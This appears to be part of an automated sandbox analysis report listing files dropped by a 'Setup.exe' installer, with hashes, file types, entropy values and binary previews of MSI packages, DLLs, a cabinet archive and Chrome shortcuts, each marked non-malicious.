MD5:	E080612B88C0048CBA8AD14F040B6375
SHA1:	6387B24983FA0B8F6271DE4CA88E6347F4C4F9F9
SHA-256:	58F0478557AD3DD5A95DD4E51B0FC9F6E8E3FEC698D8EBD0D48778C42D28A11F
SHA-512:	51AC5FBBF43B97A7353268F1337167D045DB1E473417777601BE0ABDB72BA5B131D8C00B0EA759399DBE5FD1ABD9841131A6D4AB395545C1401F5B12150F13C2
Malicious:	false
Preview:	......................>...................-...................................J.......c.......P...Q...R...S...T...U...V.......S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z.......................................................................................................................................................................................................................................................................................i...............$...7........................................................................................... ...!..."...#.......0...&...'...(...)...*...+...,...-......./...1...5...2...3...4...8...6...?...B...9...:...;...<...=...>...I...@...A...L...C...D...E...F...G...H...p...q.......L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Roaming\Lemcorporation\Setup 0.5.1.2\install\Setup1.cab

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 493138 bytes, 1 file, at 0x2c +A "Setup.exe", ID 1234, number 1, 33 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	493138
Entropy (8bit):	7.997880953733528
Encrypted:	true
SSDEEP:	12288:6JgmEUpCNBLdSAP+UE0c3u7qE51k0gBfHpLh:6twJTP+Ui3Uz87F
MD5:	CB41A41AB28EA8C6FBF3FC86A048EE94
SHA1:	AB4EF0E4E3F30C7B501374A769319E88B82F7C0C
SHA-256:	D052130DB60840FFBE98519EB1023001F347E193576E8A328C81838B13A9B657
SHA-512:	0286EC41BE75CDB3EB388138E4328AC7C83AE7A409C9411829AB8D3DDDC6692FF08EADABFAC8B72513C40AE1127A85D544485B62B3D022BF79A0923988035963
Malicious:	false
Preview:	MSCF....R.......,...................F...!....f.........Y.. .Setup.exe......M..CK.}y\|SU..K.@........h.....Z.<...$P...V.(B.U..K....g..QG..3.+mu$....".....j@..P@y.s.}.....}>..~.....{....o~H...`..a.B...<....c...A.....v....v..8{.........].[...........s.v{.Op.u..3/OKK.4.....E.+........7*7..fe2.o..W^..}y#....V]C....p...Z....;?..t.sTe..FW...W-.B.[u..../.hO%..(..9%....i.E>A.}e.!e....qm..BJR.S.."...)..I....7.!._B.+.8...6;!f...;..3...C......,..6...?x<. ..%....J.~.K....x..%M..w......M..z..<4.,.nVn......=.[.f\>..[C.B.H+.)x..K..F.g....N.C^p..../v.<....c...~f}.../A.F..l......#...@F...J.0.7;O.7.X.._...,YK...tA.86I...U6...z.Z.......C^.]B.z"S=$455QZ}..i.$...%m...K...L..=..tA.)...~.Z.....O$.L..T.OS(.".T...C...D.E]..R.DZJ...<.(.vdDg...O....R.R"K.d..)....'I..b.Fi..!....N#...r....:7.(.. .dEf'd5.99..{..^vXVN..W]G....).....9z..a...../...,...2."m...l<D........._9i]..L...c.7....:.8../....`...._8...<\|..v..m.^{3'.l.....f..+..=......g..hs :.....$.R.11.p%......}.."H...=.Tn.

C:\Users\user\AppData\Roaming\Lemcorporation\Setup 0.5.1.2\install\holder0.aiph

Download File

Process:	C:\Users\user\Desktop\Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	493138
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	ABC1FD2252144A6928A4F0A2942EC402
SHA1:	A54E5ACDBEE320E7995E8C00AE80CB5458276574
SHA-256:	9BDC73C1472F0BCFEB6C08F72ED2D8215F7A60D7DFA71A9B9D5EB1798E3995FD
SHA-512:	2B9B30903F335EFDDC6286363B90C05F0A0DBF2A9D544A34EDF1729C09047BF353D05FAEE5D0586F94707A3C9B93E22C67CB19AB06390C7DF5FB69138E1ED97F
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 5 19:51:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.977824084540992
Encrypted:	false
SSDEEP:	48:8bpd3TvPjHSidAKZdA19ehwiZUklqehpy+3:8XzkOy
MD5:	C6E60E06515500E8B5961F294D75F0AC
SHA1:	82F62BE1EA0E7DCA1CCB277CDCD8DDBF33400FBE
SHA-256:	0E72CFC2BFFF659F6B942D978C03DB3E5CBD79D5680B2735F1AA5221CE688B8F
SHA-512:	3598A0EE2960235A3728782373768C3F6F48A603CA471B0E91681004DE4D10CE031D718E94355D1550556FFDF551A5F9013AA189B557D8A6F1C352DECF740D89
Malicious:	false
Preview:	L..................F.@.. ...$+.,....H.-.WG..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yx.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yx.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yx.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yx............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yz............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r..A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 5 19:51:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.992264946528014
Encrypted:	false
SSDEEP:	48:8lpd3TvPjHSidAKZdA1weh/iZUkAQkqeh+y+2:89zW9QDy
MD5:	92679C96A738D7D2F9AAB6C2B694E7EE
SHA1:	28C6E8EAA6D3DD4B5A7C1414ED576F81EE51C9E8
SHA-256:	60EA9B4923E074C9A32C22FEBFB0918D757C905339D17D739B059E1348C9D13F
SHA-512:	FBEA136FA1AA7AA5E493B1FD22E0AE42E795D8B2DFC1F09D82E8C34B1C29251FD4B1CA980C73FCF0805FD352F4697D8711BCE5CC0CCC733F0F4CA663CCC3D4B4
Malicious:	false
Preview:	L..................F.@.. ...$+.,....D$..WG..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yx.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yx.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yx.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yx............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yz............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r..A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.004677023741562
Encrypted:	false
SSDEEP:	48:8xwd3TvPsHSidAKZdA14tseh7sFiZUkmgqeh7s4y+BX:8xczPnyy
MD5:	FF0F96BEF7F88DEEA75C7E018B48316F
SHA1:	EDCFFBDA236BDE050FDD881086DADC94C2B72EC2
SHA-256:	4582244D94B64DC460EDDDCFBC39E5B8953D8C641196B4AC1E2F12364B0E3561
SHA-512:	CCB8F5DF3C5085ECC4486F002FE97674E1BECC47D63EE1869FB09F0FA5E64452F50D3A8DD3184CE30742DA078709D9E147E168F6486F58A391331473A207746C
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yx.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yx.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yx.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yx............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r..A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 5 19:51:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.99459656911249
Encrypted:	false
SSDEEP:	48:8AWpd3TvPjHSidAKZdA1vehDiZUkwqehqy+R:8Pz9wy
MD5:	DF2B5E6FCECE132DFD3C30D76B7BC5E1
SHA1:	AF1F92A3E95B051D87B638E9CA3783B852AAA1B8
SHA-256:	98BA51821560A6BCB25F2013BCFD76F5B3483D13FF6ABD504BFD4EA9550D6471
SHA-512:	51CB29719075408295DF21EBB8AC02FED78B28B7D78B9916101A8C84AD96AA2AA2FB45EE8BE05826723F877D0FA72152E652EBD09531FB01A631075C2D86C165
Malicious:	false
Preview:	L..................F.@.. ...$+.,........WG..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yx.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yx.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yx.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yx............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yz............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r..A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 5 19:51:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9810644820345895
Encrypted:	false
SSDEEP:	48:8Qpd3TvPjHSidAKZdA1hehBiZUk1W1qehcy+C:8Uzd98y
MD5:	39FFDEB100F6AE16EB10A8DCE28D0192
SHA1:	BD8703C048ADE8DA7F878CAE735EDCCCA2BD9219
SHA-256:	B6499EBA36F0BC9C897DE3B9DAA938FB22246A6A421C6E8400A0969A89C03241
SHA-512:	298886D68C1A3401E6536EDB1A05B98D45806DCA01E5B0C81A9A5E786ABD920E2093BF118208FA7CF2BD54B6A7304BE0A93E8F40ABA77D87E52122D8F646EEEC
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....z&.WG..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yx.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yx.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yx.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yx............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yz............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r..A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 5 19:51:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.993288449201286
Encrypted:	false
SSDEEP:	48:8fpd3TvPjHSidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbyy+yT+:8LzhT/TbxWOvTbyy7T
MD5:	CFFEA9E915163E5859318DB04F676799
SHA1:	C5095533800070AB87BFF84D3C079EB325413F0A
SHA-256:	11447399F67B0BB81F70A54C155590BEACE0304631608B0334B12AB514CAA207
SHA-512:	980149C4A8F529C3F76912B34F9CA26C22BAA4C3B50044AD9B5F047678D1079D5168703182C2A2765C1B4FEAFD2386516ADB1EAE4D35C975705455367FBF8E1A
Malicious:	false
Preview:	L..................F.@.. ...$+.,.......WG..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yx.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yx.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yx.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yx............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yz............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........r..A.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Windows\Installer\559de8.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {E0F293FF-F9D5-4C95-80EE-A8361BF1CA07}, Number of Words: 2, Subject: Setup, Author: Lemcorporation, Name of Creating Application: Setup, Template: ;1033, Comments: This installer database contains the logic and data required to install Setup., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu Dec 5 16:01:21 2024, Last Saved Time/Date: Thu Dec 5 16:01:21 2024, Last Printed: Thu Dec 5 16:01:21 2024, Number of Pages: 450
Category:	dropped
Size (bytes):	2897408
Entropy (8bit):	6.624211501037971
Encrypted:	false
SSDEEP:	49152:6Twz0A+biU50unDNyGAkMmq6KGk/cHrOGGY8Wea/xwuxrrDdQWiP+GrhmI/Yk6iX:pKUBN6TkkHtdQlrh
MD5:	E080612B88C0048CBA8AD14F040B6375
SHA1:	6387B24983FA0B8F6271DE4CA88E6347F4C4F9F9
SHA-256:	58F0478557AD3DD5A95DD4E51B0FC9F6E8E3FEC698D8EBD0D48778C42D28A11F
SHA-512:	51AC5FBBF43B97A7353268F1337167D045DB1E473417777601BE0ABDB72BA5B131D8C00B0EA759399DBE5FD1ABD9841131A6D4AB395545C1401F5B12150F13C2
Malicious:	false
Preview:	......................>...................-...................................J.......c.......P...Q...R...S...T...U...V.......S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z.......................................................................................................................................................................................................................................................................................i...............$...7........................................................................................... ...!..."...#.......0...&...'...(...)...*...+...,...-......./...1...5...2...3...4...8...6...?...B...9...:...;...<...=...>...I...@...A...L...C...D...E...F...G...H...p...q.......L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\559dea.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {E0F293FF-F9D5-4C95-80EE-A8361BF1CA07}, Number of Words: 2, Subject: Setup, Author: Lemcorporation, Name of Creating Application: Setup, Template: ;1033, Comments: This installer database contains the logic and data required to install Setup., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu Dec 5 16:01:21 2024, Last Saved Time/Date: Thu Dec 5 16:01:21 2024, Last Printed: Thu Dec 5 16:01:21 2024, Number of Pages: 450
Category:	dropped
Size (bytes):	2897408
Entropy (8bit):	6.624211501037971
Encrypted:	false
SSDEEP:	49152:6Twz0A+biU50unDNyGAkMmq6KGk/cHrOGGY8Wea/xwuxrrDdQWiP+GrhmI/Yk6iX:pKUBN6TkkHtdQlrh
MD5:	E080612B88C0048CBA8AD14F040B6375
SHA1:	6387B24983FA0B8F6271DE4CA88E6347F4C4F9F9
SHA-256:	58F0478557AD3DD5A95DD4E51B0FC9F6E8E3FEC698D8EBD0D48778C42D28A11F
SHA-512:	51AC5FBBF43B97A7353268F1337167D045DB1E473417777601BE0ABDB72BA5B131D8C00B0EA759399DBE5FD1ABD9841131A6D4AB395545C1401F5B12150F13C2
Malicious:	false
Preview:	......................>...................-...................................J.......c.......P...Q...R...S...T...U...V.......S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z.......................................................................................................................................................................................................................................................................................i...............$...7........................................................................................... ...!..."...#.......0...&...'...(...)...*...+...,...-......./...1...5...2...3...4...8...6...?...B...9...:...;...<...=...>...I...@...A...L...C...D...E...F...G...H...p...q.......L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSI9F40.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSI9FAE.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSI9FFD.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1021792
Entropy (8bit):	6.608727172078022
Encrypted:	false
SSDEEP:	24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
MD5:	EE09D6A1BB908B42C05FD0BEEB67DFD2
SHA1:	1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
SHA-256:	7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
SHA-512:	2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L.....$g.........."!...).....`...... ........ ...........................................@A............................L...,...@....................Z..`=......\....K..p....................L...... K..@............ ...............................text............................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................

C:\Windows\Installer\MSIA03D.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	907616
Entropy (8bit):	6.596490785969308
Encrypted:	false
SSDEEP:	24576:8rrgmu6fBmxqtT5NdJshY1gnWiqpph0lhSMXluGrhmI/Yk6ibf9:8rrDdQWiP+GrhmI/Yk6ibf9
MD5:	1D51848E7512C27AF22CDF0213E11CF5
SHA1:	D35AB52E49C82BB72F0AD7C7568035E8A41564E4
SHA-256:	0B73497F2AD7A4A04F36B8D46816C5404BA828D7FEECA90B3ABE28599E9C4619
SHA-512:	B6513F1AB6AF820FD139BA5FE5399268077C328B8DBD19471DB203F94F6AEC2702BAAEC37209B4056531CAB56D54B09F6D446F0F398BEFA1CC9CD4F77E65E079
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L.....$g.........."!...).............V....................................................@A.........................................p..h...............`=..............p...............................@.......................@....................text............................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................

C:\Windows\Installer\MSIA0BB.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	423776
Entropy (8bit):	6.506598580316902
Encrypted:	false
SSDEEP:	12288:6l7GrJZsRtP01Ab+biU50unhTzTQWNy7koDG6zTV:+7UJaR10A+biU50unhFNyfG6fV
MD5:	13AF359DF8DB39B20A0A3ADDCDAD8D21
SHA1:	7BBBE3B5A8E01E18CB57C1DB50E2AB05BD501CEC
SHA-256:	A33B88914578CF7876898DDFAF8B6C313F1D6A5ABEAFCCDDFC640EF42906DF8B
SHA-512:	58B767AB43F6D97BDEBBA784BE155BA729A46CB2842DFF79B90415E7C562EF75EA3AE726D4052CF18087162EC71F344C69C706B75F8243D6A1A0DBD0760F8AB9
Malicious:	false
Preview:	...@IXOS.@.....@D~.Y.@.....@.....@.....@.....@.....@......&.{BF99BD40-5B10-4B93-AA83-429E8C408451}..Setup..Setup.msi.@.....@.....@.....@........&.{E0F293FF-F9D5-4C95-80EE-A8361BF1CA07}.....@.....@.....@.....@.......@.....@.....@.......@......Setup......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{79B9F234-9F00-482D-8BEC-944130F09304},.C:\Program Files (x86)\Lemcorporation\Setup\.@.......@.....@.....@......&.{6E68FD45-DBD1-4112-A14B-590B6AA86CAE}).02:\Software\Lemcorporation\Setup\Version.@.......@.....@.....@......&.{B6B915B2-8E9A-4251-A700-A3FA1E40B040}!.C:\Users\Public\Desktop\Setup.exe.@.......@.....@.....@......&.{85138663-7876-4819-88C6-B2A1707A608F}f.02:\Software\Caphyon\Advanced 